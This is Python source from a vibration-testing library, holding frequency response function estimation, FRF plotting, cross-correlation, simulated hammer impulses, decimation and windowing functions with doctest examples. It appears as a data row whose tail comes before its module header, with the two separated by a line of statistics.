nfreq = 1 / dt / 2
f = np.linspace(0, nfreq, Pxy.shape[1]) # /2./np.pi
return f, Pxy
def frfest(x, f, dt, windowname="hanning", ave=bool(True), Hv=bool(False)):
r"""Return freq, H1, H2, coh, Hv.
Estimates the :math:`H(j\omega)` Frequency Response Functions (FRFs)
between :math:`x` and :math:`f`.
Parameters
----------
x : float array
output or response of system
f : float array
input to system
dt : float
time step of samples
windowname : string
One of: hanning, hamming, blackman, flatwin, boxwin
ave : bool, optional(True)- currently locked
whether or not to average PSDs and ASDs or calculate raw FRFs
Hv : bool, optional(False)
calculate the :math:`H_v` frequency response function
Returns
-------
freq : float array
frequency vector (1xN)
H1 : float array
Frequency Response Function :math:`H_1` estimate, (nxN) or (nxNxm)
H2 : float array
Frequency Response Function :math:`H_2` estimate, (nxN) or (nxNxm)
coh : float array
Coherance Function :math:`\gamma^2` estimate, (nxN)
Hv : float array
Frequency Response Function :math:`H_v` estimate, (nxN) or (nxNxm)
Currently ``ave`` is locked to default values.
Examples
--------
>>> import control as ctrl
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy as np
>>> sample_freq = 1e3
>>> noise_power = 0.001 * sample_freq / 2
>>> A = np.array([[0, 0, 1, 0],
... [0, 0, 0, 1],
... [-200, 100, -.2, .1],
... [100, -200, .1, -.2]])
>>> B = np.array([[0], [0], [1], [0]])
>>> C = np.array([[35, 0, 0, 0], [0, 35, 0, 0]])
>>> D = np.array([[0], [0]])
>>> sys = ctrl.ss(A, B, C, D)
>>> tin = np.arange(0, 51.2, .1)
>>> nr = .5 # 0 is all noise on input
>>> for i in np.arange(520):
... u = np.random.normal(scale=np.sqrt(noise_power), size=tin.shape)
... #print(u)
... t, yout, xout = ctrl.forced_response(sys, tin, u,rtol=1e-12)
... if 'Yout' in locals():
... Yout=np.dstack((Yout,yout
... +nr*np.random.normal(scale=.050*np.std(yout[0,:]),
... size=yout.shape)))
... Ucomb=np.dstack((Ucomb,u+(1-nr)
... *np.random.normal(scale=.05*np.std(u),
... size=u.shape)))
... else:
... Yout=yout+nr*np.random.normal(scale=.05*np.std(yout[0,:]),
... size=yout.shape)
... # noise on output is 5% scale of input
... Ucomb=u+(1-nr)*np.random.normal(scale=.05*np.std(u),
... size=u.shape)#(1, len(tin)))
... # 5% noise signal on input
>>> f, Hxy1, Hxy2, coh, Hxyv = vt.frfest(Yout, Ucomb, t, Hv=bool(True))
>>> vt.frfplot(f,Hxy2,freq_max=3.5, legend=['$H_{11}$', '$H_{12}$'])
... # doctest: +SKIP
>>> vt.frfplot(f, np.vstack((Hxy1[0,:], Hxy2[0,:], Hxyv[0,:])),
... legend=['$H_{11-1}$','$H_{11-2}$','$H_{11-v}$'])
... # doctest: +SKIP
Notes
-----
.. note:: Not compatible with scipy.signal functions
.. seealso:: :func:`asd`, :func:`crsd`, :func:`frfplot`.
.. warning:: hanning window cannot be selected yet. Averaging cannot be
unslected yet.
.. todo:: Fix averaging, windowing, multiple input.
"""
if len(f.shape) == 1:
f = f.reshape(1, -1, 1)
if len(x.shape) == 1:
x = x.reshape(1, -1, 1)
if len(f.shape) == 2:
if (f.shape).index(max(f.shape)) == 0:
f = f.reshape(max(f.shape), min(f.shape), 1)
else:
f = f.reshape(1, max(f.shape), min(f.shape))
if len(x.shape) == 2:
if (x.shape).index(max(x.shape)) == 0:
x = x.reshape(max(x.shape), min(x.shape), 1)
else:
x = x.reshape(1, max(x.shape), min(x.shape))
# Note: Two different ways to ignore returned values shown
Pff = asd(f, dt, windowname=windowname)[1]
freq, Pxf = crsd(x, f, dt, windowname=windowname)
_, Pxx = asd(x, dt)
# Note Pfx=conj(Pxf) is applied in the H1 FRF estimation
Txf1 = np.conj(Pxf / Pff)
Txf2 = Pxx / Pxf
# Nulled to avoid output problems/simplify calls if unrequested
Txfv = np.zeros_like(Txf1)
coh = (Pxf * np.conj(Pxf)).real / Pxx / Pff
if Hv:
for i in np.arange(Pxx.shape[1]):
frfm = np.array(
[[Pff[0, i], np.conj(Pxf[0, i])], [Pxf[0, i], Pxx[0, i]]])
alpha = 1 # np.sqrt(Pff[0,i]/Pxx[0,i])
frfm = np.array([[Pff[0, i], alpha * np.conj(Pxf[0, i])],
[alpha * Pxf[0, i], alpha**2 * Pxx[0, i]]])
lam, vecs = la.eigh(frfm)
index = lam.argsort()
lam = lam[index]
vecs = vecs[:, index]
Txfv[0, i] = -(vecs[0, 0] / vecs[1, 0]) / alpha
return freq, Txf1, Txf2, coh, Txfv
def frfplot(freq, H, freq_min=0, freq_max=None, type=1, legend=[]):
"""Frequency Response Function pretty plotting.
Plots frequency response functions in a variety of formats
Parameters
----------
freq : float array
Frequency vector (rad/sec), (1xN)
H : float array
Frequency response functions (nxN)
freq_min : float, optional
Low frequency for plot (default 0)
freq_min : float, optional
High frequency for plot (default max frequency)
legend : string array
Array of string for use in legend.
type : int, optional
Plot type. See notes.
Returns
-------
ax : axis objects
allows manipulation of plot parameters (xlabel, title...)
Examples
--------
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy as np
>>> f=np.linspace(0,100,10000).reshape(-1,1);
>>> w=f*2*np.pi;
>>> k=1e5;m=1;c=1;
>>> frf1=1./(m*(w*1j)**2+c*1j*w+k)
>>> frf2=1./(m*(w*1j)**2+c*1j*w+k*3)
>>> _ = vt.frfplot(f,np.hstack((frf1,frf2)), legend = ['FRF 1','FRF 2'])
... # doctest: +SKIP
Notes
-----
+---------+------------------------------------------------+
| type | Plot style |
+=========+================================================+
| 1 (def) | Magnitude and Phase versus F |
+---------+------------------------------------------------+
| 2 | Magnitude and Phase versus log10(F) |
+---------+------------------------------------------------+
| 3 | Bodelog (Magnitude and Phase versus log10(w)) |
+---------+------------------------------------------------+
| 4 | Real and Imaginary |
+---------+------------------------------------------------+
| 5 | Nyquist (Imaginary versus Real) |
+---------+------------------------------------------------+
| 6 | Magnitude versus F |
+---------+------------------------------------------------+
| 7 | Phase versus F |
+---------+------------------------------------------------+
| 8 | Real versus F |
+---------+------------------------------------------------+
| 9 | Imaginary versus F |
+---------+------------------------------------------------+
| 10 | Magnitude versus log10(F) |
+---------+------------------------------------------------+
| 11 | Phase versus log10(F) |
+---------+------------------------------------------------+
| 12 | Real versus log10(F) |
+---------+------------------------------------------------+
| 13 | Imaginary versus log10(F) |
+---------+------------------------------------------------+
| 14 | Magnitude versus log10(w) |
+---------+------------------------------------------------+
| 15 | Phase versus log10(w) |
+---------+------------------------------------------------+
.. seealso:: `frfest`
Copyright J. Slater, Dec 17, 1994
Updated April 27, 1995
Ported to Python, July 1, 2015
"""
FLAG = type # Plot type, should libe renamed throughout.
freq = freq.reshape(1, -1)
lenF = freq.shape[1]
if len(H.shape) is 1:
H = H.reshape(1, -1)
if H.shape[0] > H.shape[1]:
H = H.T
if freq_max is None:
freq_max = np.max(freq)
if freq_min is None:
freq_min = np.min(freq)
if freq_min < np.min(freq):
freq_min = np.min(freq)
if freq_min > freq_max:
raise ValueError('freq_min must be less than freq_max.')
# print(str(np.amin(freq)))
inlow = int(lenF * (freq_min - np.amin(freq)
) // (np.amax(freq) - np.amin(freq)))
inhigh = int(lenF * (freq_max - np.amin(freq)
) // (np.amax(freq) - np.amin(freq)) - 1)
# if inlow<1,inlow=1;end
# if inhigh>lenF,inhigh=lenF;end
"""print('freq shape: {}'.format(freq.shape))
print('H shape: {}'.format(H.shape))
print('Index of low frequency: {}'.format(inlow))
print('Index of high frequency: {}'.format(inhigh))"""
H = H[:, inlow:inhigh]
# print(H.shape)
freq = freq[:, inlow:inhigh]
mag = 20 * np.log10(np.abs(H))
# print(mag)
# print(mag.shape)
minmag = np.min(mag)
maxmag = np.max(mag)
phase = np.unwrap(np.angle(H)) * 180 / np.pi
# phmin_max=[min(phase)//45)*45 ceil(max(max(phase))/45)*45];
phmin = np.amin(phase) // 45 * 45.0
phmax = (np.amax(phase) // 45 + 1) * 45
"""minreal = np.amin(np.real(H))
maxreal = np.amax(np.real(H))
minimag = np.amin(np.imag(H))
maximag = np.amax(np.imag(H))"""
if FLAG is 1:
fig, (ax1, ax2) = plt.subplots(2, 1)
ax1.plot(freq.T, mag.T)
ax1.set_xlabel('Frequency (Hz)')
ax1.set_ylabel('Mag (dB)')
ax1.grid()
ax1.set_xlim(xmax=freq_max, xmin=freq_min)
ax1.set_ylim(ymax=maxmag, ymin=minmag)
ax2.plot(freq.T, phase.T)
ax2.set_xlabel('Frequency (Hz)')
ax2.set_ylabel('Phase (deg)')
ax2.grid()
ax2.set_xlim(xmax=freq_max, xmin=freq_min)
ax2.set_ylim(ymax=phmax, ymin=phmin)
ax2.set_yticks(np.arange(phmin, (phmax + 45), 45))
fig.tight_layout()
if len(legend) > 0:
plt.legend(legend)
ax = (ax1, ax2)
else:
print("Sorry, that option isn't supported yet")
return ax
"""# elif FLAG==2:
# subplot(2,1,1)
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# % Fmin,Fmax,min(mag),max(mag)
# axis([Fmin Fmax minmag maxmag])
# subplot(2,1,2)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elif FLAG==3:
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elseif FLAG==4
# subplot(2,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# subplot(2,1,2)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==5
# subplot(1,1,1)
# imax=round(length(F)*Fmax/max(F));
# imin=round(length(F)*Fmin/max(F))+1;
# plot(real(Xfer(imin:imax)),imag(Xfer(imin:imax)))
# xlabel('Real')
# ylabel('Imaginary')
# grid on
# zoom on
# elseif FLAG==6
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==7
# subplot(1,1,1)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==8
# subplot(1,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==9
# subplot(1,1,1)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==10
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==11
# subplot(1,1,1)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==12
# subplot(1,1,1)
# semilogx(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==13
# subplot(1,1,1)
# semilogx(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==14
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# elseif FLAG==15
# subplot(1,1,1)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# else
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
"""
def xcorr(t, x, y, zeropad=True):
"""Sorry, no docs or tests yet."""
tau = t
# sx = len(x)
# sy = len(y)
if zeropad is True:
Xn = np.fft.rfft(x, n=len(x) * 2)
Yn = np.conj(sp.fft(y, n=len(x) * 2))
else:
Xn = np.fft.rfft(x)
Yn = np.conj(np.fft.rfft(y))
xcor = np.real(fftpack.fftshift(sp.ifft(Xn * Yn)))
dt = t[1] - t[0]
tau = np.linspace(-len(xcor) / 2 * dt - dt / 2,
len(xcor) / 2 * dt - dt / 2, len(xcor))
return tau, xcor
def hammer_impulse(time, imp_time=None, imp_duration=None, doublehit=False,
dh_delta=None):
"""Generate simulated hammer hit (half sine).
Parameters
----------
time : float array
1 x N time array. Suggest using `np.linspace(0,10,1000).reshape(1,-1)`
for example
imp_time : float (optional)
Time of onset of impulse. Default is 0.1 time end time- which
traditionally works well for impact testing
imp_duration : float (optional)
Duration of impulse. Default is 0.01 of total record
doublehit : Boolean (optional)
Allows repeat of hit to emulate a bad strike. Default is False
dh_delta : float (optional)
Time difference between primary strike and accidental second strike
Default is 0.02 of record.
Returns
-------
force : float array
Examples
--------
>>> import vibrationtesting as vt
>>> time = np.linspace(0,10,1024).reshape(1,-1)
>>> force = vt.hammer_impulse(time, doublehit=True)
>>> plt.plot(time.T, force.T)
[<matplotlib.lines.Line2D object...
"""
time_max = np.max(time)
if imp_time is None:
imp_time = 0.1 * time_max
if imp_duration is None:
imp_duration = 0.01 * time_max
if dh_delta is None:
dh_delta = 0.02
dh_delta = dh_delta * time_max
time = time.reshape(1, -1)
imp_onset_index = int(time.shape[1] * imp_time / time_max)
imp_offset_index = int((time.shape[1]) *
(imp_time + imp_duration) / time_max)
imp_length = imp_offset_index - imp_onset_index
T = imp_duration * 2
omega = 2 * np.pi / T
impulse = np.sin(omega * time[0, :imp_length])
force = np.zeros_like(time)
force[0, imp_onset_index:imp_onset_index + imp_length] = impulse
if doublehit is True:
doub_onset_index = int(time.shape[1]
* (imp_time + dh_delta) / time_max)
force[0, doub_onset_index:doub_onset_index + imp_length] = impulse
force = force / spi.simps(force.reshape(-1), dx=time[0, 1])
return force
def decimate(t, in_signal, sample_frequency):
r"""Decimate a signal to mimic sampling anti-aliased signal.
Returns the signal down-sampled to `sample_frequency` with an
anti-aliasing filter applied at 45% of ` sample_frequency`.
Parameters
----------
t : float array
time array, size (N,)
signal : float array
signal array, size (N,), (m,N), or (m,N,n)
sample_frequency : float
new sampling frequency
Returns
-------
time : float array
decimated_signal : float array
Examples
--------
>>> time = np.linspace(0,4,4096)
>>> u = np.random.randn(1,len(time))
>>> ttime, signal_out = decimate(time, u, 100)
"""
dt = t[1] - t[0]
current_frequency = 1 / dt
freq_frac = sample_frequency / current_frequency
Wn = .9 * freq_frac
b, a = signal.butter(8, Wn, 'low')
if len(in_signal.shape) > 1:
filtered_signal = signal.lfilter(b, a, in_signal, axis=1)
else:
filtered_signal = signal.lfilter(b, a, in_signal)
step = int(1 / freq_frac)
time = t[::step]
if len(in_signal.shape) == 1:
filtered_signal = filtered_signal[::step]
elif len(in_signal.shape) == 2:
filtered_signal = filtered_signal[:, ::step]
elif len(in_signal.shape) == 3:
filtered_signal = filtered_signal[:, ::step, :]
return time, filtered_signal
| 32.849488 | 208 | 0.523773 | """
Signal processing, creation and plotting.
Analysis of data and generation of simulated experiments.
"""
__license__ = "Joseph C. Slater"
__docformat__ = 'reStructuredText'
# import warnings
import numpy as np
import scipy as sp
import scipy.fftpack as fftpack
import scipy.linalg as la
import matplotlib.pyplot as plt
import scipy.integrate as spi
import scipy.signal as signal
"""
Notes:
------
Sept. 3, 2016
Development of windows in scipy.signal has been rapid and
determining what I should build into this module, or simply leverage
from scipy.signal has been a moving target.
It's now apparent that creating or returning a window is pointless. Further,
Applying should be a relatively simple code obviating much of any need for the
code here.
The cross spectrum analysis formerly lacking is now available, periodogram
is usually the best option, however not with impulse excitations. See
`scipy.signal` for this. Unfortunately, the conventions in this module are not
consistent with `scipy.signal`. They follow those of `python-control`
FRF calculation is typically trivial, Hv being an expected gap long term
MIMO FRF calculation is an open question. Pretty printing of FRFs is always
a welcome tool.
System ID is likely the remaining missing aspect at this time.
In order to be consistent with the Control Systems Library, increasing time
or increasing frequency steps positively with increased column number (one
dimension). Rows (0 dimension)
correspond to appropriate channels, output numbers, etc.
For cross spectrum data (cross spectrum density, frequency response function)
the 2 dimension represents the input channel.
The last dimension (2 or 3) indexes each data instance (experiment). That means
that an unaveraged cross spectrum density has dimension 4. If there is only a
single input channel, it is imperative to insist the dimention exist, even if
only length 1. This is analagous to a vector being Nx1 versus simply a
1-D array of length 1.
http://python-control.readthedocs.io/en/latest/conventions.html#time-series-data
Problem: This hasn't been fully implemented.
"""
def window(x, windowname='hanning', normalize=False):
r"""Create leakage window.
Create a window of length :math:`x`, or a window sized to match
:math:`x` that :math:`x\times w` is the windowed result.
Parameters
----------
x: integer, float array
| If integer- number of points in desired hanning windows.
| If array- array provides size of window returned.
windowname: string
One of: hanning, hamming, blackman, flatwin, boxwin
normalize: bool, optional(False)
Adjust power level (for use in ASD) to 1
Returns
-------
w: float array
| window array of size x
| window array. Windowed array is then :math:`x\times w`
Examples
--------
>>> import numpy as np
>>> import vibrationtesting as vt
>>> import matplotlib.pyplot as plt
>>> sample_freq = 1e3
>>> tfinal = 5
>>> fs = 100
>>> A = 10
>>> freq = 5
>>> noise_power = 0.001 * sample_freq / 2
>>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1))
>>> xsin = A*np.sin(2*np.pi*freq*time)
>>> xcos = A*np.cos(2*np.pi*freq*time) # assembling individual records.
>>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack
>>> xw=vt.hanning(x)*x
>>> fig, (ax1, ax2) = plt.subplots(2,1)
>>> ax1.plot(time.T,x[:,:,1].T)
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_ylim([-20, 20])
(-20, 20)
>>> ax1.set_title('Original (raw) data.')
Text(0.5,1,'Original (raw) data.')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
>>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A,'--',
... time[0,:],-vt.hanning(x)[0,:]*A,'--')
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylabel('Hanning windowed $x(t)$')
Text(0,0.5,'Hanning windowed $x(t)$')
>>> ax2.set_xlabel('time')
Text(0.5,0,'time')
>>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude')
Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude')
>>> fig.tight_layout()
"""
if isinstance(x, (list, tuple, np.ndarray)):
"""Create Hanning windowing array of dimension `n` by `N` by `nr`
where `N` is number of data points and `n` is the number of number of
inputs or outputs and `nr` is the number of records."""
swap = 0
if len(x.shape) == 1:
# We have either a scalar or 1D array
if x.shape[0] == 1:
print("x is a scalar... and shouldn\'t have entered this \
part of the loop.")
else:
N = len(x)
f = window(N, windowname=windowname)
elif len(x.shape) == 3:
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('You shouldn\'t do that.')
print('The 1 dimension is the time (or frequency) \
incrementing dimension.')
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
N = x.shape[1]
f = window(N, windowname=windowname)
f, _, _ = np.meshgrid(f, np.arange(
x.shape[0]), np.arange(x.shape[2]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
elif len(x.shape) == 2:
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('You shouldn\'t do that.')
print('The 1 dimension is the time (or frequency) ' +
'incrementing dimension.')
print('Swapping axes temporarily to be compliant with ' +
'expectations.')
print('I\'ll reluctantly return a transposed result.')
f = window(x.shape[1], windowname=windowname)
f, _ = np.meshgrid(f, np.arange(x.shape[0]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
else:
N = x
if windowname is 'hanning':
f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
elif windowname is 'hamming':
f = (0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1)))\
* np.sqrt(5000 / 1987)
elif windowname is 'blackman':
print('blackman')
f = (0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(N) + .5) / (N))
+ .08 * np.cos(4 * np.pi * (np.arange(N) + .5) / (N)))\
* np.sqrt(5000 / 1523)
elif windowname is 'flatwin':
f = 1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1))\
+ 1.286 * np.cos(4 * np.pi * (np.arange(N)) / (N - 1))\
- 0.338 * np.cos(6 * np.pi * (np.arange(N)) / (N - 1))\
+ 0.032 * np.cos(8 * np.pi * (np.arange(N)) / (N - 1))
elif windowname is 'boxwin':
f = np.ones((1, N))
else:
f = np.ones((1, N))
print("I don't recognize window name ", windowname, ". Sorry.")
if normalize is True:
f = f / la.norm(f) * np.sqrt(N)
return f
def hanning(x, normalize=False):
r"""Return hanning window.
Create a hanning window of length :math:`x`, or a hanning window sized to
match :math:`x` that :math:`x\times w` is the windowed result.
Parameters
----------
x: integer, float array
| If integer- number of points in desired hanning windows.
| If array- array provides size of window returned.
windowname: string
One of: hanning, hamming, blackman, flatwin, boxwin
normalize: bool, optional(False)
Adjust power level (for use in ASD) to 1
Returns
-------
w: float array
| window array of size x
| window array. Windowed array is then :math:`x\times w`
Examples
--------
>>> import numpy as np
>>> import vibrationtesting as vt
>>> import matplotlib.pyplot as plt
>>> sample_freq = 1e3
>>> tfinal = 5
>>> fs = 100
>>> A = 10
>>> freq = 5
>>> noise_power = 0.001 * sample_freq / 2
>>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1))
>>> xsin = A*np.sin(2*np.pi*freq*time)
>>> xcos = A*np.cos(2*np.pi*freq*time)
>>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack
>>> xw=vt.hanning(x)*x
>>> fig, (ax1, ax2) = plt.subplots(2, 1)
>>> ax1.plot(time.T,x[:,:,1].T)
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_ylim([-20, 20])
(-20, 20)
>>> ax1.set_title('Unwindowed data, 2 records.')
Text(0.5,1,'Unwindowed data, 2 records.')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
>>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A,
... '--',time[0,:],-vt.hanning(x)[0,:]*A,'--')
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylabel('Hanning windowed $x(t)$')
Text(0,0.5,'Hanning windowed $x(t)$')
>>> ax2.set_xlabel('time')
Text(0.5,0,'time')
>>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude')
Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude')
>>> fig.tight_layout()
"""
if isinstance(x, (list, tuple, np.ndarray)):
"""Create Hanning windowing array of dimension n by N by nr
where N is number of data points and n is the number of number of
inputs or outputs and nr is the number of records."""
swap = 0
if len(x.shape) == 1:
# We have either a scalar or 1D array
if x.shape[0] == 1:
print("x is a scalar... and shouldn\'t have \
entered this part of the loop.")
else:
N = len(x)
f = hanning(N)
elif len(x.shape) == 3:
# print('a')
# print(f.shape)
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
f = hanning(x.shape[1])
f, _, _ = np.meshgrid(f, np.arange(
x.shape[0]), np.arange(x.shape[2]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
elif len(x.shape) == 2:
# f,_=np.meshgrid(f[0,:],np.arange(x.shape[0]))
# print('b')
# print('length = 2')
# print(x.shape)
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
f = hanning(x.shape[1])
f, _ = np.meshgrid(f, np.arange(x.shape[0]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
else:
# print(x)
# Create hanning window of length x
N = x
# print(N)
f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
if normalize is True:
f = f / la.norm(f) * np.sqrt(N)
return f
def blackwin(x):
"""Return the n point Blackman window.
Returns x as the Blackman windowing array x_window
The windowed signal is then x*x_window
"""
print('blackwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = blackwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape((0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(n) + .5)) /
(n) + .08 * np.cos(4 * np.pi * (np.arange(n) + .5)) /
(n)) * np.sqrt(5000 / 1523), (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def expwin(x, ts=.75):
"""Return the n point exponential window.
Returns x as the expwin windowing array x_windowed
The windowed signal is then x*x_window
The optional second argument set the 5% "settling time" of the window.
Default is ts=0.75
"""
print('expwin is untested')
tc = -ts / np.log(.05)
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = expwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
v = (n - 1) / n * np.arange(n) + (n - 1) / n / 2
f = np.exp(-v / tc / (n - 1))
f = f / la.norm(f) * np.sqrt(n)
f = np.reshape(f, (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def hammwin(x):
"""Return the n point hamming window.
Returns x as the hamming windowingarray x_windowed
The windowed signal is then x*x_window
"""
print('hammwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = hammwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape((0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(n)) /
(n - 1))) * np.sqrt(5000 / 1987),
(1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def flatwin(x):
"""Return the n point flat top window.
x_windows=flatwin(x)
Returns x as the flat top windowing array x_windowed
The windowed signal is then x*x_window
McConnell, K. G., "Vibration Testing: Theory and Practice," Wiley, 1995.
"""
print('flatwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = flatwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape(
(1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(n)) / (n - 1))
+ 1.286 * np.cos(4 * np.pi * (np.arange(n)) / (n - 1))
- 0.338 * np.cos(6 * np.pi * (np.arange(n)) / (n - 1))
+ 0.032 * np.cos(8 * np.pi * (np.arange(n)) / (n - 1))),
(1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def boxwin(x):
"""Return the n point box window (uniform).
Returns x as the boxwin windowing array x_windowed
The windowed signal is then x*x_window
"""
print('boxwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = boxwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
